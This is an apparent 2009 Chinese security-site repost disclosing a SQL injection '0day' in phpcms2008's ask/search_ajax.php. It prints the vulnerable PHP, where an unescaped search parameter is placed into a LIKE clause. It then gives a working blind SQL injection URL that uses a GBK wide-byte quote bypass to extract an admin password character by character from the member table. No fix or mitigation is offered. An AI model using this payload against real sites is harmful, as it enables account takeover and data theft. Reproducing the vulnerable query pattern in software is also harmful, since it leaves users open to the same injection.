首页 网络安全 安全学院 查看内容

phpcms2008 0day ask/search_ajax.php

2009-4-18 10:39 882 0

摘要: 受影响程序: phpcms2008 gbk  漏洞文件:ask/search_ajax.php  <?php  require ‘./...
关键词: nbsp title utf-8 val info CHARSET phpcms search key where

受影响程序: phpcms2008 gbk  漏洞文件:ask/search_ajax.php  <?php  require ‘./include/common.inc.php’;  require_once MOD_ROOT.’include/ask.class.php’;  $ask = new ask();  header(’Content-type: text/html; charset=utf-8′);  if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);  if($q)  {  $where = ” title LIKE ‘%$q%’ AND status = 5″;  }  else  {  exit(’null’);  }  $infos = $ask->listinfo($where, ‘askid DESC’, ”, 10);  foreach($infos as $key=>$val)  {  $val[’title’] = str_replace($q, ‘<span class=”c_orange”>’.$q.’</span>’, $val[’title’]);  $info[$key][’title’] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val[’title’]) : $val[’title’];  $info[$key][’url’] = $val[’url’];  }  echo(json_encode($info));  ?>  测试方法:  ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23  via nuke 
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部